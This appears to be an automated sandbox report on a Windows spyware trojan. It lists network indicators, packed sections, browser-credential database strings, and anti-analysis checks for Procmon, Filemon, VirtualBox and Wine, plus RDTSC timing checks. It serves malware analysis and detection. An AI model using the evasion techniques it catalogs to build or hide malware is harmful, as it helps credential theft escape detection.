                Source: P0SJULJxI0.exe, 00000000.00000003.2095511369.000000000151A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49776 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49782 version: TLS 1.2

                System Summary

                barindex
                Source: P0SJULJxI0.exeStatic PE information: section name:
                Source: P0SJULJxI0.exeStatic PE information: section name: .rsrc
                Source: P0SJULJxI0.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_014666C50_3_014666C5
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_014666C50_3_014666C5
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_014666C50_3_014666C5
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_014666C50_3_014666C5
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08D40_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08D40_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08D40_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08D40_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08E00_3_05CC08E0
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08E00_3_05CC08E0
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08E00_3_05CC08E0
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08D40_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08D40_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08D40_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08D40_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08E00_3_05CC08E0
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08E00_3_05CC08E0
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC08E00_3_05CC08E0
                Source: P0SJULJxI0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: P0SJULJxI0.exeStatic PE information: Section: ZLIB complexity 0.9995212928921569
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: P0SJULJxI0.exe, 00000000.00000003.1627534660.0000000005C2D000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1627078020.0000000005C49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: P0SJULJxI0.exeVirustotal: Detection: 52%
                Source: P0SJULJxI0.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile read: C:\Users\user\Desktop\P0SJULJxI0.exeJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: P0SJULJxI0.exeStatic file information: File size 2954240 > 1048576
                Source: P0SJULJxI0.exeStatic PE information: Raw size of nszjqukc is bigger than: 0x100000 < 0x2a7600

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeUnpacked PE file: 0.2.P0SJULJxI0.exe.b50000.0.unpack :EW;.rsrc :W;.idata :W;nszjqukc:EW;kpouiknl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;nszjqukc:EW;kpouiknl:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: P0SJULJxI0.exeStatic PE information: real checksum: 0x2e00dd should be: 0x2de848
                Source: P0SJULJxI0.exeStatic PE information: section name:
                Source: P0SJULJxI0.exeStatic PE information: section name: .rsrc
                Source: P0SJULJxI0.exeStatic PE information: section name: .idata
                Source: P0SJULJxI0.exeStatic PE information: section name: nszjqukc
                Source: P0SJULJxI0.exeStatic PE information: section name: kpouiknl
                Source: P0SJULJxI0.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CBFA19 push ecx; retn 0005h0_3_05CBFA42
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CBFA19 push ecx; retn 0005h0_3_05CBFA42
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CBFA19 push ecx; retn 0005h0_3_05CBFA42
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CBFA19 push ecx; retn 0005h0_3_05CBFA42
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CBFA19 push ecx; retn 0005h0_3_05CBFA42
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CBFA19 push ecx; retn 0005h0_3_05CBFA42
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CBFA19 push ecx; retn 0005h0_3_05CBFA42
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CBFA19 push ecx; retn 0005h0_3_05CBFA42
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeCode function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: P0SJULJxI0.exeStatic PE information: section name: entropy: 7.975723556996926

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D25589 second address: D2558D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D09907 second address: D0990B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D246F0 second address: D246F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D24ABF second address: D24AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D24C55 second address: D24C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D24C5E second address: D24C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA944B213E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D275B0 second address: D275B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D27706 second address: D2770B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D2774A second address: D277B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007FA944C70C86h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push ecx 0x00000010 jmp 00007FA944C70C8Eh 0x00000015 pop esi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FA944C70C88h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 jmp 00007FA944C70C8Ch 0x00000037 call 00007FA944C70C89h 0x0000003c push esi 0x0000003d jmp 00007FA944C70C8Eh 0x00000042 pop esi 0x00000043 push eax 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jp 00007FA944C70C86h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D278A6 second address: D278AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D279E3 second address: D27A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xor dword ptr [esp], 797FB39Eh 0x0000000d and ecx, 32639180h 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FA944C70C88h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1FF1h], ecx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D2C8Eh] 0x0000003d mov ecx, dword ptr [ebp+122D2C4Eh] 0x00000043 push 00000003h 0x00000045 call 00007FA944C70C8Bh 0x0000004a mov edi, ebx 0x0000004c pop esi 0x0000004d push A3718943h 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 push edx 0x00000056 pop edx 0x00000057 pop edi 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D27A44 second address: D27A4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D27A4A second address: D27AAE instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 1C8E76BDh 0x00000013 mov esi, dword ptr [ebp+122D2B9Eh] 0x00000019 call 00007FA944C70C8Fh 0x0000001e jbe 00007FA944C70C8Ch 0x00000024 mov dword ptr [ebp+122D1F79h], esi 0x0000002a pop esi 0x0000002b lea ebx, dword ptr [ebp+124524DAh] 0x00000031 call 00007FA944C70C8Ah 0x00000036 and esi, dword ptr [ebp+122D2073h] 0x0000003c pop edi 0x0000003d push ebx 0x0000003e jns 00007FA944C70C89h 0x00000044 pop ecx 0x00000045 xchg eax, ebx 0x00000046 pushad 0x00000047 push edi 0x00000048 js 00007FA944C70C86h 0x0000004e pop edi 0x0000004f push ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D3A064 second address: D3A078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007FA944B213F0h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D1C13F second address: D1C151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 jo 00007FA944C70C86h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D45C5E second address: D45C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FA944B213E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D45C68 second address: D45C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FA944C70C8Ch 0x0000000e je 00007FA944C70C86h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D45C85 second address: D45C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D45EDD second address: D45F24 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA944C70CA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA944C70C99h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D45F24 second address: D45F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D45F28 second address: D45F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D4634D second address: D46396 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA944B213F6h 0x00000008 jmp 00007FA944B213F0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA944B213EEh 0x00000016 pushad 0x00000017 jmp 00007FA944B213EAh 0x0000001c jmp 00007FA944B213F2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46396 second address: D4639D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D4639D second address: D463A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D463A2 second address: D463B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA944C70C86h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46505 second address: D46532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA944B213F8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46532 second address: D46538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46538 second address: D46564 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA944B213E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007FA944B213E6h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jmp 00007FA944B213EFh 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46989 second address: D469B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C97h 0x00000007 jmp 00007FA944C70C8Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46CC2 second address: D46D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007FA944B213E6h 0x00000013 popad 0x00000014 jng 00007FA944B21418h 0x0000001a jmp 00007FA944B213ECh 0x0000001f pushad 0x00000020 jmp 00007FA944B213F8h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46D03 second address: D46D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D1DB85 second address: D1DB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D1DB8F second address: D1DBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA944C70C93h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jns 00007FA944C70C86h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D1DBB3 second address: D1DBBD instructions: 0x00000000 rdtsc 0x00000002 js 00007FA944B213E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46FA9 second address: D46FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA944C70C86h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
